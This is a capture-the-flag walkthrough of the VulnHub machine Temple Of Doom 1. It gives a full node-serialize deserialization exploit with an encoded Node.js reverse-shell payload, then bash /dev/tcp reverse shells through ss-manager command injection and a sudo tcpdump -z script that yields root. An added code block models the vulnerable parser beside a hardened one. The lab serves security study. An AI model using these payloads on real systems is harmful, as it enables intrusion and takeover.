[Vulnhub Walkthrough] Temple Of Doom: 1


Preparation

Basic target information

Target name: Temple Of Doom 1
Operating system: Linux
Virtualization software: VirtualBox
Network mode: bridged to the physical network
Objective: obtain root on the target and read the flag file

Download: 1. Temple of Doom: 1 ~ VulnHub

2. vulnhub target machines, free download via Baidu Netdisk share (the VMware build is recommended)

Environment setup

Download the target archive from the shared link and extract it. On the VMware Workstation home screen choose File => Open, select the Temple_Of_Doom.ovf file in the dialog, and the target is imported.


Information gathering

IP address discovery

Before attacking the target we first locate its IP address with netdiscover:

```shell
netdiscover -r 192.168.2.0/24
```

The target's IP address turns out to be 192.168.2.131.

Firewall probing

With the IP address known, we first check basic connectivity with ping:

```shell
└─# ping -c 4 192.168.2.131
PING 192.168.2.131 (192.168.2.131) 56(84) bytes of data.
64 bytes from 192.168.2.131: icmp_seq=1 ttl=64 time=1.64 ms
64 bytes from 192.168.2.131: icmp_seq=2 ttl=64 time=0.902 ms
64 bytes from 192.168.2.131: icmp_seq=3 ttl=64 time=0.848 ms
64 bytes from 192.168.2.131: icmp_seq=4 ttl=64 time=0.871 ms

--- 192.168.2.131 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3006ms
rtt min/avg/max/mdev = 0.848/1.064/1.637/0.331 ms
```

Connectivity between the attacker and the target is fine.

Next we have Nmap send TCP ACK packets to probe for a stateful firewall in front of the target:

```shell
┌──(root㉿attacker)-[/home/hacker]
└─# nmap -sA -p- 192.168.2.131 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-27 10:23 CST
Nmap scan report for 192.168.2.131 (192.168.2.131)
Host is up (0.00029s latency).
All 65535 scanned ports on 192.168.2.131 (192.168.2.131) are in ignored states.
Not shown: 65535 unfiltered tcp ports (reset)
MAC Address: 00:0C:29:D5:F5:FD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.50 seconds
```

Every port answered with a RST, which Nmap reports as unfiltered: nothing in the path is dropping our probes. An ACK scan cannot tell open ports from closed ones, though, so we go straight to a port scan.

Port scanning

Next we use Nmap SYN scans to enumerate the target's ports, service versions and OS fingerprint:

```shell
# Full TCP sweep (SYN scan) with version detection and OS fingerprinting
nmap -sS -sV -O -p- -oN ./tcp_result.txt 192.168.2.131
# UDP: Nmap's default top 1000 ports, with default scripts and version detection
nmap -sC -sU -sV -T4 -oN ./udp_result.txt 192.168.2.131
```

TCP port scan results:

UDP port scan results:

The following ports are open on the target:

| Port | Transport | Service | Details |
|------|-----------|---------|---------|
| 22 | TCP | SSH | OpenSSH 7.7 (protocol 2.0) |
| 666 | TCP | HTTP | Node.js Express framework |

Nmap's OS fingerprint places the kernel roughly in the Linux 3.2 - 4.9 range.


Service enumeration

SSH (port 22)

Grab the service banner with Netcat:

```shell
┌──(root㉿attacker)-[/home/hacker/Documents/vulnhub_notes/temple_of_doom]
└─# nc -nv 192.168.2.131 22
(UNKNOWN) [192.168.2.131] 22 (ssh) open
SSH-2.0-OpenSSH_7.7
```

An ssh login attempt as root hangs without any response; the SSH service seems to be broken, so we set it aside.

Web application (port 666)

Open the home page in a browser (refresh once): http://192.168.2.131:666/

The page turns out to call a Node.js deserialization module (node-serialize), which points at a deserialization vulnerability. The request headers for the page are:

```http
GET / HTTP/1.1
Host: 192.168.2.131:666
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D
Upgrade-Insecure-Requests: 1
```

Base64-decoding the cookie value gives:

```text
{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMT"}
```

(The trailing %3D in the cookie is just the URL-encoded '=' padding of the Base64 string; it is not part of the JSON.)

The value of the Expires field is missing its opening double quote, so the object is not valid JSON. After adding the quote, Base64-encoding the result and resending it, the page renders without an error:

The page evidently takes the Base64-encoded, serialized JSON object from the profile cookie, unserializes it, extracts the username value and echoes it into the page.


Exploitation

Putting the findings together, we try CVE-2017-5941 (code execution through node-serialize's unserialize()) against the application.

We use the Node.Js-Security-Course tool to generate the Node.js reverse-shell code:

```shell
git clone https://github.com/ajinabraham/Node.Js-Security-Course.git
chmod -R 777 ./Node.Js-Security-Course
cd ./Node.Js-Security-Course
python2 ./nodejsshell.py 192.168.2.50 443
```

The payload is generated:

Next we write a short piece of Node.js code to serialize it:

```js
// Malicious object: its rce property is a function whose body eval()s the
// reverse-shell payload emitted by nodejsshell.py (String.fromCharCode form).
var revshell = {
    rce : function(){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,50,46,53,48,34,59,10,80,79,82,84,61,34,52,52,51,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}
}
// node-serialize writes a function as a string prefixed with _$$ND_FUNC$$_,
// which is exactly what the target's unserialize() will hand to eval().
var serialize = require('node-serialize');
console.log(serialize.serialize(revshell));
```

This code defines a malicious object revshell, loads the node-serialize module, serializes the object and prints the result.

Output:

Copy the payload into Burp Suite's Decoder. Append the call operator () to the end of the string value of the rce member, so that the function is invoked the moment it is deserialized, then Base64-encode the result, append %3D (the URL-encoded '=' seen in the original cookie) and send it as the profile cookie. At the same time start a listener on local port 443:

```shell
rlwrap nc -lvnp 443
```

The reverse shell connects back:
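The cookie handling analysed above and the payload step (appending () to the serialized function) are easiest to see in code. The following is an added example written for this page, not code from the walkthrough, from the target application or from the node-serialize module: it re-implements node-serialize's function-revival behaviour (the _$$ND_FUNC$$_ marker and the eval() call) in a few lines, uses the profile cookie captured in the request above, and stands a harmless flag-setting function in for the reverse shell. The hardened parser beside it is the fix a reviewer would ask for: treat the cookie as data, never as code.

```javascript
// Added example (editor's code, not from the walkthrough or from node-serialize).
// It models the behaviour CVE-2017-5941 abuses: node-serialize writes functions
// as strings prefixed with _$$ND_FUNC$$_ and, in unserialize(), hands any such
// string to eval(). Appending "()" to the serialized function turns it into an
// immediately-invoked expression, so it runs while the cookie is being parsed,
// before the application ever reads "username".
const FUNC_FLAG = '_$$ND_FUNC$$_';

// The profile cookie captured from the request headers above (URL-encoded Base64).
const CAPTURED_COOKIE =
  'eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D';

// Cookie -> JSON text: undo URL encoding (%3D is the Base64 '=' padding), then Base64.
function decodeProfileCookie(cookieValue) {
  return Buffer.from(decodeURIComponent(cookieValue), 'base64').toString('utf8');
}

// JSON text -> cookie: Base64, then URL-encode (this is what turns '=' into %3D).
function encodeProfileCookie(jsonText) {
  return encodeURIComponent(Buffer.from(jsonText, 'utf8').toString('base64'));
}

// VULNERABLE, modelled on node-serialize.unserialize(): every string value that
// starts with FUNC_FLAG is handed to eval(). Cookie bytes become code.
function unsafeUnserialize(jsonText) {
  const obj = JSON.parse(jsonText);
  for (const key of Object.keys(obj)) {
    const value = obj[key];
    if (typeof value === 'string' && value.startsWith(FUNC_FLAG)) {
      obj[key] = eval('(' + value.slice(FUNC_FLAG.length) + ')'); // the sink
    }
  }
  return obj;
}

// HARDENED: the profile is data, never code. JSON.parse only, a fixed shape,
// and only the fields the application needs are copied out.
function safeParseProfile(jsonText) {
  const obj = JSON.parse(jsonText);
  if (obj === null || typeof obj !== 'object' || Array.isArray(obj)) {
    throw new Error('profile must be a JSON object');
  }
  const { username, csrftoken } = obj;
  if (typeof username !== 'string' || !/^[A-Za-z0-9_]{1,32}$/.test(username)) {
    throw new Error('invalid username');
  }
  if (typeof csrftoken !== 'string' || csrftoken.length > 64) {
    throw new Error('invalid csrftoken');
  }
  return { username, csrftoken };
}

function safeProfileRejects(jsonText) {
  try { safeParseProfile(jsonText); return false; } catch (e) { return true; }
}

// Constructed payload: a harmless side effect stands in for the reverse shell.
// The "()" after the function body is the detail added by hand in Burp above.
const DEMO_PAYLOAD = JSON.stringify({
  rce: FUNC_FLAG + 'function(){ globalThis.unserializeRan = true; return "ran"; }()',
});

function demo() {
  const decoded = decodeProfileCookie(CAPTURED_COOKIE);        // malformed JSON, as seen above
  const fixed = decoded.replace('"Expires=":Friday', '"Expires=":"Friday');
  const hit = unsafeUnserialize(DEMO_PAYLOAD);                 // the payload runs here
  return {
    decoded,
    fixedUsername: safeParseProfile(fixed).username,           // 'Admin'
    payloadCookie: encodeProfileCookie(DEMO_PAYLOAD),          // value for Cookie: profile=
    unsafeResult: hit.rce,                                     // 'ran'
    ran: globalThis.unserializeRan === true,
  };
}

console.log(demo());
```

Run it with node. The decoded cookie fails JSON.parse exactly as observed on the page (the unquoted Expires value); the payload executes inside unsafeUnserialize() before any application code looks at the object; and the hardened parser rejects both the payload and the malformed cookie. Note that the attack does not depend on the rest of the object being sensible: any string value carrying the marker is enough.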


Privilege escalation

Local enumeration

With a low-privileged shell on the target, we upload LinPEAS for local enumeration.

```shell
wget http://192.168.2.50:9000/linpeas.sh
chmod 700 ./linpeas.sh
./linpeas.sh
```

Basic information:

User information:

Process information:

Scheduled tasks:

Files with special permissions:

The following can be gathered:

  • The web root is /home/nodeadmin/.web
  • Higher-privileged users on the target: root, nodeadmin, fireman
  • The kernel is an older Linux 4.16.3, and sudo is version 1.8.22b1
  • User fireman runs a process whose executable is /usr/local/bin/ss-manager

Privilege escalation via Shadowsocks

Having found the absolute path of fireman's process, we run the binary with -V to find out what it is:

```shell
[nodeadmin@192 ~]$ /usr/local/bin/ss-manager -V
 2024-01-27 21:03:36 ERROR: Unrecognized option: (null)

shadowsocks-libev 3.1.0

  maintained by Max Lv <max.c.lv@gmail.com> and Linus Yang <laokongzi@gmail.com>

  usage:

    ss-manager

       -s <server_host>           Host name or IP address of your remote server.
       -p <server_port>           Port number of your remote server.
       -l <local_port>            Port number of your local server.
       -k <password>              Password of your remote server.
......
```

The program is the ss-manager daemon of the Shadowsocks proxy, version shadowsocks-libev 3.1.0.

Look for known vulnerabilities in this version:

```shell
searchsploit shadowsocks
```

There is an exploit matching exactly this version. Viewing it:

```text
Proof of Concept
----------------
As passed configuration requests are getting executed, the following command
will create file "evil" in /tmp/ on the server:

nc -u 127.0.0.1 8839
    add: {"server_port":8003, "password":"test", "method":"||touch
/tmp/evil||"}

The code is executed through shadowsocks-libev/src/manager.c.
If the configuration file on the file system is manipulated, the code
would get executed as soon as a Shadowsocks instance is started from
ss-manage, as long as the malicious part of the configuration has not
been overwritten.
```

To reproduce it we connect to the target's 8839/udp port with Netcat, type add: {"server_port":8003, "password":"test", "method":"||<command>||"} and press Enter. Because the PoC talks to 127.0.0.1, this is done from the shell we already have on the target, and whatever we inject runs with the privileges of the user owning the ss-manager process, fireman.

Here we inject a command that sends a reverse shell to port 80 on the attacker host:

```shell
[nodeadmin@192 ~]$ nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"||bash -i >& /dev/tcp/192.168.2.50/80 0>&1||"}
```

A shell as fireman comes back:

Privilege escalation via tcpdump

Move to fireman's home directory and list everything:

```shell
[fireman@192 root]$ cd ~
[fireman@192 ~]$ ls -lA
total 36
-rw------- 1 fireman fireman 2151 Jun  7  2018 .bash_history
-rw-r--r-- 1 fireman fireman   18 Mar 15  2018 .bash_logout
-rw-r--r-- 1 fireman fireman  193 Mar 15  2018 .bash_profile
-rw-r--r-- 1 fireman fireman  231 Mar 15  2018 .bashrc
drwx------ 3 fireman fireman 4096 Jun  3  2018 .config
-rw------- 1 fireman fireman   16 Jun  3  2018 .esd_auth
drwxr-xr-x 4 fireman fireman 4096 Apr 25  2018 .mozilla
drwxrwxr-x 2 fireman fireman 4096 Jun  3  2018 .shadowsocks
drwx------ 2 fireman fireman 4096 Jun  2  2018 .ssh
```

Check with sudo -l which commands fireman may run:

```shell
[fireman@192 ~]$ sudo -l
Matching Defaults entries for fireman on 192:
    !visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
    LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
    LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
    LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
    LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fireman may run the following commands on 192:
    (ALL) NOPASSWD: /sbin/iptables
    (ALL) NOPASSWD: /usr/bin/nmcli
    (ALL) NOPASSWD: /usr/sbin/tcpdump
```

Looking up privilege-escalation techniques for iptables, nmcli and tcpdump in turn, tcpdump offers the following route:

The idea is to create an executable script somewhere and have tcpdump run it through its -z post-rotate option. -G 1 -W 1 makes tcpdump rotate its (discarded, -w /dev/null) capture file after one second and then exit; -z <script> runs <script> <savefile> after each rotation; and -Z root stops tcpdump from dropping to an unprivileged user before doing so, so the script runs as root. One caveat: tcpdump only checks the rotation timer when a packet arrives, so if nothing comes back, generate some loopback traffic from another shell (for example ping -c 3 127.0.0.1). The full command:

```shell
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z <script path> -Z root
```

Here the script sends a reverse shell to port 8000 on the attacker host:

```shell
# Post-rotate script; tcpdump invokes it as "/tmp/getroot.sh <savefile>"
touch /tmp/getroot.sh
chmod 700 /tmp/getroot.sh
echo '#!/bin/bash' > /tmp/getroot.sh
echo 'bash -i >& /dev/tcp/192.168.2.50/8000 0>&1' >> /tmp/getroot.sh
# A listener (rlwrap nc -lvnp 8000) must already be running on the attacker host
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/getroot.sh -Z root
```

Success!


Flag file

File name: flag.txt
Path: /root/flag.txt
Size: 1.9 KiB
MD5: 6f14ebde10f6a78a652a632f3b1cfae6
SHA256: cb56c037ed80a9504fc019ced4a5d85508f100e62bf2a474d4320f2554adcc6c

Screenshot of the file contents:


This concludes the walkthrough of the target.
